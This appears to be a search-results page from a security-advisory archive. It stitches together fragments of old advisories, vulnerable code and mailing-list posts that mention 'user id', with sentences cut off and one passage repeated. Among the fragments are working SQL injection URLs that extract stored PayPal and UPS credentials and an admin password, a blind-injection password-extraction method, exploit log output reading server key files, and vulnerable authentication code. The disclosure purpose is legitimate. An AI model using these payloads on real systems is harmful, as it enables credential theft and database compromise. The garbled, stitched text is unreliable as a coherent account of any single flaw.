Next Page >>
User ID
Digital Security Research Group [DSecRG] Advisory #DSECRG-11-008
Application: Progress OpenEdge Enterprise RDBMS
Versions Affected: 10.2A and maybe others
Vendor URL: http://web.progress.com
Bug: Authentication bypass, UserID enumerate
Exploits: YES
Reported: 13.10.2009
Vendor response: 13.10.2009
Solution: NONE
Date of Public Advisory:24.01.2011
upass = line.split('-pass')[1]
dn1 = 1
elif line.find('-pass') == -1 and dn1 == 0:
upass = ""
if line.find('-id') != -1 and dn2 == 0:
userid = line.split('-id')[1]
dn2 = 1
elif line.find('-id') == -1 and dn2 == 0:
userid = ""
if line.find('-port') != -1 and dn3 == 0:
$sessid = COM_applyFilter ($_COOKIE[$_CONF['cookie_session']]);
if ($_SESS_VERBOSE) {
COM_errorLog("got $sessid as the session id from lib-sessions.php",1);
}
$userid = SESS_getUserIdFromSession($sessid, $_CONF['session_cookie_timeout'], $_SERVER['REMOTE_ADDR'], $_CONF['cookie_ip']);
if ($_SESS_VERBOSE) {
COM_errorLog("Got $userid as User ID from the session ID",1);
}
-----------------------------------------------------------------------
Talsoft S.R.L. Security Advisory
WordPress User IDs and User Names Disclosure
-----------------------------------------------------------------------
I. Advisory information
Title: WordPress User IDs and User Names Disclosure
Advisory Id: TALSOFT-2011-0526
Advisory URL: http://www.talsoft.com.ar/index.php/research/security-advisories/wordpress-user-id-and-user-name-disclosure
Date published: 2011-05-26
configured to not follow the redirect, the whole page content is shown
to the attacker.
As the Owl Intranet Engine uses the PHP function extract() on the global
arrays $_POST and $_GET, it is possible to set the value of the global
variable $userid by passing it as a GET variable. Appending the string
"?userid=VALUE" to the URL allows to set an arbitrary value for the
userid.
The initial "admin" user always has the id "1", so this value can be
used to get an administrative user's id. In the fIsAdmin() function, the
actions can be forged on behalf of the target user.
Notes:
- - The victim's user ID ('id') parameter and course ID ('course'
parameter) are required for a successful attack. However, such values
are public as they can be obtained from many sections of the site such as:
user blogs ('/blog/')
chats
8.1. *Weak security question mechanism*
[CVE-2010-3272] The procedure to recover a lost password involves the
user answering a series of security questions set during enrollment.
After the recovery request and user ID have been sent, the system
requires the user to answer a certain number of security questions,
whose answers are then sent using a POST request, as seen below.
/-----
POST /accounts/ValidateAnswers?methodToCall=validateAll HTTP/1.1
administrator account.
Preconditions
- No table prefix is being used
- The gallery functions are enabled for member profiles
- User-ID of an adminitrator account is 1
- The vBulletin database error page is unmodified and shows the executed
SQL as an HTML comment
- The account being used has permissions to modify gallery profil settings
1) Go to <forumroot>/profile.php?do=vbgalleryprofile
result page for the search
will be empty if @Condition be false and will show all links if
@Condition be true.
So we can replace @Condition with a query like
EXISTS (SELECT * FROM blazedb.dbo.aspnet_Membership WHERE
(LEN(Password) < 32) AND UserId=??)
and then brout force on the length and then on each character of the
password (Of course
we need first extract the user id from username by another query like
above and then fill ?? with
the user id of the admin which is the same process).
> > the PHP developers will reconsider in time.
> And they are right. Unix security, and therefore application security,
> cannot protect you from you, and if the attacker can run processes as you,
> as far as Unix is concerned, he is you. If you want to prevent attackers
> from making processes you run do things you don't want, don't let them run
> processes on your user id.
This is exactly what the patch I included does; it prevents users from running PHP scripts as the user ID.
>
> The only thing that could be done, would be to make the process running as
users in that jail will never be the same ones as the real system users.
You can specify the user set with the usual tools by specifying the
full user path, e.g.:
0/0 defines user id 0 (root) in virtual set 0 (eg system user root)
0/1000 defines user id 1000 in virtual set 0 (eg a system user)
1/secoff defines user secoff in virtual set 1 (e.g. with uid 400)
2/1000 defines user id 1000 in virtual set 2 (for example, mail users
could be in set 2)
> -- Vim README.txt
>
> ``Netrw supports "transparent" editing of files on other machines
> using [...] vim ftp://hostname/path/to/file''
>
> ``Attempts to use ftp will prompt you for a user-id and a password.
> These will be saved in global variables g:netrw_uid and
> s:netrw_passwd; subsequent uses of ftp will re-use those two items
> to simplify the further use of ftp. However, if you need to use a
> different user id and/or password, you'll want to call NetUserPass()
> first.''
-- Vim README.txt
``Netrw supports "transparent" editing of files on other machines
using [...] vim ftp://hostname/path/to/file''
``Attempts to use ftp will prompt you for a user-id and a password.
These will be saved in global variables g:netrw_uid and
s:netrw_passwd; subsequent uses of ftp will re-use those two items
to simplify the further use of ftp. However, if you need to use a
different user id and/or password, you'll want to call NetUserPass()
first.''
# / Trying to create a database
# + Database 92xpl_db39 successfully created
# + Using database id 12
# / Trying to add SQL user
# + User 93xpl_usr2 successfully created
# + Using SQL user id 17
# + Host thegoodone.com is a valid user
# + Logged in (thegoodone.com - Client)
# / Trying to load files via local_infile
# + Ok: /etc/vhcs2/vhcs2.conf
# + Ok: /var/www/vhcs2/gui/include/vhcs2-db-keys.php
The web application uses cookie parameters passed via HTTP
requests to identify which user is logged in. Authentication
routines can be bypassed by simply appending the below POC
string to a cookie which already contains a valid ASP.NET
session ID. The value given to the various cookie parameters
indicates the specific user ID for the application user the
attacker wishes to impersonate.
Proof of Concept.
To exploit this vulnerability, simply browse to the software
to automatically create a valid ASP.NET session ID. Once
File affected: index.php, register.php, viewall.php
The following lines are improperly checked:
/*
if (isset($_COOKIE['blogmanuserid'])) {
$id = $_COOKIE['blogmanuserid'];
$query = "SELECT * FROM user WHERE UserID='".$id."'";
$user = mysql_fetch_array(mysql_query($query)) or die(mysql_error());
echo "<p class='loginusername'><a
href='edit.php?id=".$id."'>".$user['UserName']."</a></p>\n";
There is a fairly serious SQL Injection issue in CS-Cart that, as
mentioned before, allows attackers to easily bypass authentication, or
retrieve arbitrary data from the underlying database. The vulnerable
code can be found in /core/user.php
if (fn_get_cookie(AREA_NAME . '_user_id')) {
$udata = db_get_row("SELECT user_id, user_type, tax_exempt, last_login,
membership_status,
membership_id FROM $db_tables[users] WHERE
user_id='".fn_get_cookie(AREA_NAME . '_user_id')."'
AND password='".fn_get_cookie(AREA_NAME . '_password')."'");
ppUsername:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='ppUserName'%20or%20'2'='1&action=get&inventory=1
ppSignature:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='ppSignature'%20or%20'2'='1&action=get&inventory=1
----
UPS UserID:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='UPSUserID'%20or%20'2'='1&action=get&inventory=1
UPS Password:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='UPSPassword'%20or%20'2'='1&action=get&inventory=1
UPS Access ID:
http://[CandyPressURL]/ajax/ajax_optInventory.asp?idProduct=-1%20or%201=1&options='%20union%20select%20configVal%20as%20inventory%20from%20storeAdmin%20where%20configVar='UPSAccessID'%20or%20'2'='1&action=get&inventory=1
The Oracle XML DB ftp service contains problems with auditing logins.
Details
*******
When a user attempts to log in via the XDB ftp service the audit trail shows
an incorrect entry for USERID. This can present two subtle problems.
Firstly, if a user logs in as "SYSTEM" the USERID column only shows "SYSTE"
- only 5 characters. The second problem is that if the same user then
attempts to log in a user "FOO", "FOOTE" is logged in the USERID column -
the "TE" coming from the "TE" of "SYSTE[M]" - the previous login. This only
happens on the same connected TCP circuit; as such all audit entries have
========
1.1
Multiple remote SQL Injection vulnerabilities are detected in MYREs Real Estate Mobile Application (2012 Q2).
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands
on the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise.
The vulnerability is located in the listings & agent profile module with the bound vulnerable parameters userid & link_idd.
Vulnerable Module(s):
[+] Listings > Link_IDD
[+] Agent Profile > UserID
Affected file: includes/classes/Authenticate.class.php
023: define("COOKIE_USER", COOKIE_PREFIX."user");
024: define("COOKIE_ADMIN", COOKIE_PREFIX."admin");
147: $cookieDataArr = explode(".", $_COOKIE[COOKIE_USER]);
150: list($userID, $cookieExpiration, $cookieHash) = $cookieDataArr;
153: $result = dbquery(
154: "SELECT * FROM ".DB_USERS."
155: WHERE user_id='".$userID."' AND user_status='0' AND user_actiontime='0'
156: LIMIT 1"
157: );
~~~~~~---->Unregistered user (get var --> 'letra'):
http://[HOST]/[HOME_PATH]/index.php?letra=2'+union+all+select+1,mail,3,pass+FROM+lc_usuario+WHERE+id=1/*
<------------ Got mail/pass of user id = 1 (admin) (pass no encrypted!) ------------>
~~~~~~---->Resgistered user (get vars --> 'y' and 'm'):
http://[HOST]/[HOME_PATH]/sobre.php?m=10&y=2007'+AND+0+UNION+ALL+SELECT+1,concat(mail,'<-:::->',pass),3,4,version(),concat(user(),'<-:::->',database()),7+FROM+lc_usuario+WHERE+id=1/*
And they are right. Unix security, and therefore application security,
cannot protect you from you, and if the attacker can run processes as you,
as far as Unix is concerned, he is you. If you want to prevent attackers
from making processes you run do things you don't want, don't let them run
processes on your user id.
The only thing that could be done, would be to make the process running as
another user id, that is the php instance running from suexec, completely
distrust any input it gets from the webserver. That way, what the attacker
can do is limited to what php lets him do.
if( $this->p_uname )
$this->msg('Using targeted username '.$this->p_uname, 1);
elseif( $this->p_uid )
$this->msg('Using targeted user id '.$this->p_uid, 1);
# Target
if( !($this->p_uname || $this->p_uid) )
{
# Default uid if not precised
{
---IP ADDRESS sniffed ip address
---REFERER xssed theme
---COOKIES xssed cookies of forum member
---USER ID xssed user id of forum member
---ADMIN NAME admin username
---ADMIN PASS admin pass hash
---ADMIN SALT admin hash salt
}
> kernel/exit.c in the kernel source tree (version 2.6.22).
Dan, could you take a closer look at what setuid(0) does? In the beggining
of setuid manual page you can read that:
setuid sets the effective user ID of the current process.
If the effective userid of the caller is root, the real
and saved user ID's are also set.
In this case check_kill_permission() returns -EPERM for unprivileged
parent.
> > kernel/exit.c in the kernel source tree (version 2.6.22).
>
> Dan, could you take a closer look at what setuid(0) does? In the beggining
> of setuid manual page you can read that:
>
> setuid sets the effective user ID of the current process.
> If the effective userid of the caller is root, the real
> and saved user ID's are also set.
>
Yes, I knew that before.
The FPUpdater tool (Floating Point Updater) must be run to update the Java Development Kit (JDK) and/or the Java Runtime Environment (JRE). This tool can be used to update all versions of HP-UX Java.
To download the FPUpdater tool, go to https://www.hp.com/go/java then click on the link for the FPUpdater tool
An HP Passport user ID is required to download the FPUpdater tool and its Readme file. For information on registering for an HP Passport user ID, refer to: https://passport2.hp.com
MANUAL ACTIONS: Yes - Update
Update using FPUpdater
* SQL Injection *
An SQL Injection vulnerability is caused by assigning a variable from client
data, for example in file shopsessionsubs.asp in Function Getwebsess:
userid=cleanchars(request("websess"))
and:
userid = Request.Cookies(cookiename)
In Sub ResponseCookies variable userid is assigned to variable websess by a
call to Getwebsess and variable websess is concatenated with other data to
id = $id"); // <- id is used without clean up
other example:
1490 function remove_post(){
1491 global $user_level, $user_ID, $wpdb;
1492 $id = $_GET['id']; // <- $_GET['id'] is directly assigned
1493 $author = $wpdb->get_var("SELECT author_id from
$this->t_posts where id = $id"); // id is used without clean up
...
1503 if($del == "ok"){
Next Page>>
|
